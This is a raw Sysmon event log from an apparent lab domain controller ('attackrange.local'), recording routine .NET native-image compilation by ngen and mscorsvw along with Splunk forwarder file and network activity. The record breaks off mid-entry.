21:06:39.338{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A25F-60D3-EF04-00000000CF01}3816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022163Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:39.228{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A25F-60D3-EE04-00000000CF01}6548C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022162Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:39.228{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A25F-60D3-EE04-00000000CF01}6548C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022161Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:39.228{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A25F-60D3-EE04-00000000CF01}6548C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022160Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:39.150{4DB9351A-A25F-60D3-ED04-00000000CF01}6712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1a38-0\System.Windows.Presentation.dll2021-06-23 21:06:39.150 23542300x800000000000000022159Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:39.150{4DB9351A-9DEA-60D3-3000-00000000CF01}2404NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=CC494228D9B622F65865431EE32BBCD9,SHA256=4850E6D9F469EFAD53275876C967519322E99DE1F613F517E377B814E20689E0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022158Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:39.057{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A25F-60D3-ED04-00000000CF01}6712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022157Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:39.041{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A25F-60D3-ED04-00000000CF01}6712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022156Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:39.041{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A25F-60D3-ED04-00000000CF01}6712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 354300x800000000000000022178Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:39.189{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61454-false10.0.1.12-8089- 10341000x800000000000000022177Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:40.776{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A260-60D3-F104-00000000CF01}4760C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022176Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:40.744{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A260-60D3-F104-00000000CF01}4760C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022175Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:40.744{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A260-60D3-F104-00000000CF01}4760C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000022174Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:40.744{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFCD7CF7C49974500169D0AC840C3172,SHA256=7E7195E2E259D87E02D9C1EFF8D808A186EC18EFEACA75BFB38BE687768C9E50,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022173Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:40.635{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A260-60D3-F004-00000000CF01}4772C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022172Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:40.619{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A260-60D3-F004-00000000CF01}4772C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022171Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:40.619{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A260-60D3-F004-00000000CF01}4772C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022170Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:40.463{4DB9351A-A25F-60D3-EF04-00000000CF01}3816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\ee8-0\System.Workflow.Activities.dll2021-06-23 21:06:40.463 23542300x800000000000000022180Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:41.775{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AD090BF3CA5D7F880677ED0FD3E9B23,SHA256=496B42F7D829768B976275162EF690647B5D2B653D31E017D641021F2EB177CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022179Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:41.650{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FC1AFA7ABD7AC4A7E08E017AC34D1029,SHA256=3E920A4A4A166A08EA91870E2886F795A111475E7E9B5AC76DCE372D4AA2C0E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022181Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:42.775{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE7ACFD987924C9D1EC066760315DC51,SHA256=F98EB321E356351F74B5817510B919ED4A5CB8AE63A62964D51FDCCDB5B9CD1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022189Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:43.775{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBD71E47621FE6196BD215C778EBE07F,SHA256=AEB49DB4820650026792A3FF727BF2250E139C868F3EECE2606D38F3CF1264FC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022188Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:43.385{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A263-60D3-F304-00000000CF01}7144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022187Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:43.369{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A263-60D3-F304-00000000CF01}7144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022186Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:43.369{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A263-60D3-F304-00000000CF01}7144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022185Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:43.275{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A263-60D3-F204-00000000CF01}4728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022184Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:43.260{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A263-60D3-F204-00000000CF01}4728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022183Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:43.260{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A263-60D3-F204-00000000CF01}4728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022182Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:43.072{4DB9351A-A260-60D3-F104-00000000CF01}4760C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1298-0\System.Workflow.ComponentModel.dll2021-06-23 21:06:43.072 10341000x800000000000000022198Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 